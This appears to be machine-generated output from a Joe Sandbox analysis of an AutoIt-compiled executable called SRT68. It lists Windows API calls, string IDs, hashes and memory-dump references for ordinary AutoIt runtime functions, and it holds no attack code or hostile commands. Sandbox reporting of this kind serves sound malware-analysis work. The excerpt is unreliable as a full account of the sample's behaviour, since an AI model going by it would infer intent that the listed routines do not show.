                                                                      • Instruction ID: 19bf7332b0a513839897bd9dd29cee1c497136eae1b231340ff98102ea00f29b
                                                                      • Opcode Fuzzy Hash: 7bb6186406240c4327a91f94a22f6a7ed72ffbb06da5a88b1cc3589f5bed066e
                                                                      • Instruction Fuzzy Hash: 1AE1C274900229AFEF609F64CC84EEE7BF9EF08750F10819AFA95AB191DB748584CF50
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 010249CA
                                                                      • GetDesktopWindow.USER32 ref: 010249DF
                                                                      • GetWindowRect.USER32(00000000), ref: 010249E6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 01024A48
                                                                      • DestroyWindow.USER32(?), ref: 01024A74
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01024A9D
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01024ABB
                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01024AE1
                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 01024AF6
                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01024B09
                                                                      • IsWindowVisible.USER32(?), ref: 01024B29
                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01024B44
                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01024B58
                                                                      • GetWindowRect.USER32(?,?), ref: 01024B70
                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 01024B96
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 01024BB0
                                                                      • CopyRect.USER32(?,?), ref: 01024BC7
                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 01024C32
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: ($0$tooltips_class32
                                                                      • API String ID: 698492251-4156429822
                                                                      • Opcode ID: 06e553bd8d9aa1a5f16c046b5de1ea0c7a38331c628b926e1d98f439314b4fad
                                                                      • Instruction ID: e112900584e1e8d54598f36910ef1a78a4725ce1726e8229aa915d8461d6acff
                                                                      • Opcode Fuzzy Hash: 06e553bd8d9aa1a5f16c046b5de1ea0c7a38331c628b926e1d98f439314b4fad
                                                                      • Instruction Fuzzy Hash: 19B1A970608351AFDB54DF68C888B6ABBE4FF89310F008A1CF9D99B291D775E805CB95
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 010044AC
                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 010044D2
                                                                      • _wcscpy.LIBCMT ref: 01004500
                                                                      • _wcscmp.LIBCMT ref: 0100450B
                                                                      • _wcscat.LIBCMT ref: 01004521
                                                                      • _wcsstr.LIBCMT ref: 0100452C
                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01004548
                                                                      • _wcscat.LIBCMT ref: 01004591
                                                                      • _wcscat.LIBCMT ref: 01004598
                                                                      • _wcsncpy.LIBCMT ref: 010045C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 699586101-1459072770
                                                                      • Opcode ID: 94991a8144f7826f06a1fa23d901b00da474b63cb76dc11aa5bbb375e921cc4e
                                                                      • Instruction ID: c41b25f83a64257a76bd3c2a1e7819175bfb5f0ae39f4196262be43704a11a5b
                                                                      • Opcode Fuzzy Hash: 94991a8144f7826f06a1fa23d901b00da474b63cb76dc11aa5bbb375e921cc4e
                                                                      • Instruction Fuzzy Hash: 3F412871940202BAEB11AA75CD03FBF77BCDF45750F04445EFA41E6182EF39AA01A6A9
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FA28BC
                                                                      • GetSystemMetrics.USER32(00000007), ref: 00FA28C4
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FA28EF
                                                                      • GetSystemMetrics.USER32(00000008), ref: 00FA28F7
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00FA291C
                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FA2939
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FA2949
                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FA297C
                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FA2990
                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00FA29AE
                                                                      • GetStockObject.GDI32(00000011), ref: 00FA29CA
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA29D5
                                                                        • Part of subcall function 00FA2344: GetCursorPos.USER32(?), ref: 00FA2357
                                                                        • Part of subcall function 00FA2344: ScreenToClient.USER32(010657B0,?), ref: 00FA2374
                                                                        • Part of subcall function 00FA2344: GetAsyncKeyState.USER32(00000001), ref: 00FA2399
                                                                        • Part of subcall function 00FA2344: GetAsyncKeyState.USER32(00000002), ref: 00FA23A7
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00FA1256), ref: 00FA29FC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: 3fb88579afb83c65c6d4e0023a3434cac66463c7076f0d0b9e446334f7253e0a
                                                                      • Instruction ID: 844bb4d1f33365299abaa2bf2cff98980047e73a52773a858566ca88371e1f4d
                                                                      • Opcode Fuzzy Hash: 3fb88579afb83c65c6d4e0023a3434cac66463c7076f0d0b9e446334f7253e0a
                                                                      • Instruction Fuzzy Hash: 32B19F71A0020AEFDB24DFA8DC45BAE7BB5FB08350F10422AFA55E7294DB79D841DB50
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00FFA47A
                                                                      • __swprintf.LIBCMT ref: 00FFA51B
                                                                      • _wcscmp.LIBCMT ref: 00FFA52E
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FFA583
                                                                      • _wcscmp.LIBCMT ref: 00FFA5BF
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00FFA5F6
                                                                      • GetDlgCtrlID.USER32(?), ref: 00FFA648
                                                                      • GetWindowRect.USER32(?,?), ref: 00FFA67E
                                                                      • GetParent.USER32(?), ref: 00FFA69C
                                                                      • ScreenToClient.USER32(00000000), ref: 00FFA6A3
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00FFA71D
                                                                      • _wcscmp.LIBCMT ref: 00FFA731
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00FFA757
                                                                      • _wcscmp.LIBCMT ref: 00FFA76B
                                                                        • Part of subcall function 00FC362C: _iswctype.LIBCMT ref: 00FC3634
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                      • String ID: %s%u
                                                                      • API String ID: 3744389584-679674701
                                                                      • Opcode ID: 52fa2ac9b81ce8be7387d1b4b40a9f41c3689810078a706af5a0c70ee76b8832
                                                                      • Instruction ID: 334840f84904656b8323df249f60a2a5fa7110335cbb34aa756d06357b343ec6
                                                                      • Opcode Fuzzy Hash: 52fa2ac9b81ce8be7387d1b4b40a9f41c3689810078a706af5a0c70ee76b8832
                                                                      • Instruction Fuzzy Hash: 14A1D3B260430BABD714EF60C884FBAB7E8FF44354F148519EA9DD2160DB34E945DB92
                                                                      APIs
                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00FFAF18
                                                                      • _wcscmp.LIBCMT ref: 00FFAF29
                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00FFAF51
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00FFAF6E
                                                                      • _wcscmp.LIBCMT ref: 00FFAF8C
                                                                      • _wcsstr.LIBCMT ref: 00FFAF9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00FFAFD5
                                                                      • _wcscmp.LIBCMT ref: 00FFAFE5
                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00FFB00C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00FFB055
                                                                      • _wcscmp.LIBCMT ref: 00FFB065
                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00FFB08D
                                                                      • GetWindowRect.USER32(00000004,?), ref: 00FFB0F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                      • String ID: @$ThumbnailClass
                                                                      • API String ID: 1788623398-1539354611
                                                                      • Opcode ID: 06b6c0cc6f177da2ae4b301239a17c9133e7bf4f2e07b8a2acb20cdc39cd185f
                                                                      • Instruction ID: 6cf4e9a3cc198a3ad7b8629fa11373839c71db32af288262981aff68e5582b20
                                                                      • Opcode Fuzzy Hash: 06b6c0cc6f177da2ae4b301239a17c9133e7bf4f2e07b8a2acb20cdc39cd185f
                                                                      • Instruction Fuzzy Hash: 1881C1B140830A9BDB14DF10C885FBA77E8EF44764F148469FE898A0A5DB34DD49EB61
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                      • API String ID: 1038674560-1810252412
                                                                      • Opcode ID: 5c6d49f246ff18497b83bf369e41f092fcce9be400f3167ffb00859e5aa14c12
                                                                      • Instruction ID: ea5ce1e509f04e586d2a5867b075fbfb7dd4380f7a6b792a2c81cb1d61841b3b
                                                                      • Opcode Fuzzy Hash: 5c6d49f246ff18497b83bf369e41f092fcce9be400f3167ffb00859e5aa14c12
                                                                      • Instruction Fuzzy Hash: 2E31B0B1A44209A6DB14FBA1DE43FBF77A4AF10760FA0001CB945750A5EB55AF04F652
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 01015013
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0101501E
                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 01015029
                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 01015034
                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0101503F
                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0101504A
                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 01015055
                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 01015060
                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0101506B
                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 01015076
                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 01015081
                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0101508C
                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 01015097
                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 010150A2
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 010150AD
                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 010150B8
                                                                      • GetCursorInfo.USER32(?), ref: 010150C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$Load$Info
                                                                      • String ID:
                                                                      • API String ID: 2577412497-0
                                                                      • Opcode ID: 94ad3259e1a5960903b6722f96a6369b9a079f3dab330a53e98b264e025c61f4
                                                                      • Instruction ID: 951fc081ab20b3c37b8779f8a312764ae4b813816e1a4847adb432471f87efd9
                                                                      • Opcode Fuzzy Hash: 94ad3259e1a5960903b6722f96a6369b9a079f3dab330a53e98b264e025c61f4
                                                                      • Instruction Fuzzy Hash: 393115B1D0831A6ADF609FBA8C8985EBFF8FF04750F50452AE54CEB280DA7C65008F91
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0102A259
                                                                      • DestroyWindow.USER32(?,?), ref: 0102A2D3
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0102A34D
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0102A36F
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0102A382
                                                                      • DestroyWindow.USER32(00000000), ref: 0102A3A4
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FA0000,00000000), ref: 0102A3DB
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0102A3F4
                                                                      • GetDesktopWindow.USER32 ref: 0102A40D
                                                                      • GetWindowRect.USER32(00000000), ref: 0102A414
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0102A42C
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0102A444
                                                                        • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 1297703922-3619404913
                                                                      • Opcode ID: e75d99244ff5132b43fed6b3a19ff8a17432e76481b61141b629ddef1484b5cf
                                                                      • Instruction ID: 6c49d2afdca8d2be619a202bdf88c52bdc4ba47e8a2fa490ef89000a1056db08
                                                                      • Opcode Fuzzy Hash: e75d99244ff5132b43fed6b3a19ff8a17432e76481b61141b629ddef1484b5cf
                                                                      • Instruction Fuzzy Hash: E6719A75240205AFE721CF28CC49F6A7BE5FB89740F04455CFAC5976A0CB79E906CB62
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0102C627
                                                                        • Part of subcall function 0102AB37: ClientToScreen.USER32(?,?), ref: 0102AB60
                                                                        • Part of subcall function 0102AB37: GetWindowRect.USER32(?,?), ref: 0102ABD6
                                                                        • Part of subcall function 0102AB37: PtInRect.USER32(?,?,0102C014), ref: 0102ABE6
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0102C690
                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0102C69B
                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0102C6BE
                                                                      • _wcscat.LIBCMT ref: 0102C6EE
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0102C705
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0102C71E
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0102C735
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0102C757
                                                                      • DragFinish.SHELL32(?), ref: 0102C75E
                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0102C851
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 169749273-3440237614
                                                                      • Opcode ID: 905ad42e031f711aff6e761eb653bafcb7fea7ed78091f7bcc612093ee68620b
                                                                      • Instruction ID: bbf90f7753c11733a0ba7c42b59dbc002f193c2d3b3863138e8607b5aa94773f
                                                                      • Opcode Fuzzy Hash: 905ad42e031f711aff6e761eb653bafcb7fea7ed78091f7bcc612093ee68620b
                                                                      • Instruction Fuzzy Hash: AA618971108301AFC721EF64CD89DAFBBF8EF89790F40091EF591961A1DB75AA09CB52
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000000), ref: 01007D5F
                                                                      • VariantCopy.OLEAUT32(00000000,?), ref: 01007D68
                                                                      • VariantClear.OLEAUT32(00000000), ref: 01007D74
                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 01007E62
                                                                      • __swprintf.LIBCMT ref: 01007E92
                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 01007EBE
                                                                      • VariantInit.OLEAUT32(?), ref: 01007F6F
                                                                      • SysFreeString.OLEAUT32(00000016), ref: 01008003
                                                                      • VariantClear.OLEAUT32(?), ref: 0100805D
                                                                      • VariantClear.OLEAUT32(?), ref: 0100806C
                                                                      • VariantInit.OLEAUT32(00000000), ref: 010080AA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                      • API String ID: 3730832054-3931177956
                                                                      • Opcode ID: 8d7de4fd5936ed7e15ef0ca0e6f6851b8992cb0488647ac2654e7f60576832d8
                                                                      • Instruction ID: 5f548e299a20e85432d15b954f98158a2e76a48fd5996325dd75f14e13446be8
                                                                      • Opcode Fuzzy Hash: 8d7de4fd5936ed7e15ef0ca0e6f6851b8992cb0488647ac2654e7f60576832d8
                                                                      • Instruction Fuzzy Hash: DCD1E571A00616EBEB62EF65D844BBEB7B4BF05300F10845AE5C59B2C4CF79B850CBA1
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 01024424
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0102446F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharMessageSendUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 3974292440-4258414348
                                                                      • Opcode ID: b950b68c7f07e162fc809a218b0f94b1c5b1582398a0d9e7f1c8b4c88d6fe4a0
                                                                      • Instruction ID: 6eb81fafaeff192eb595c75e87c44eaa761bbe4969cde4d81dfb57065fe82c38
                                                                      • Opcode Fuzzy Hash: b950b68c7f07e162fc809a218b0f94b1c5b1582398a0d9e7f1c8b4c88d6fe4a0
                                                                      • Instruction Fuzzy Hash: 97918D70208311DBCB14EF14C851A6EB7E1AF95354F44486CF8D69B3A2CB79ED0ADB81
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0102B8B4
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,010291C2), ref: 0102B910
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0102B949
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0102B98C
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0102B9C3
                                                                      • FreeLibrary.KERNEL32(?), ref: 0102B9CF
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0102B9DF
                                                                      • DestroyIcon.USER32(?,?,?,?,?,010291C2), ref: 0102B9EE
                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0102BA0B
                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0102BA17
                                                                        • Part of subcall function 00FC2EFD: __wcsicmp_l.LIBCMT ref: 00FC2F86
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
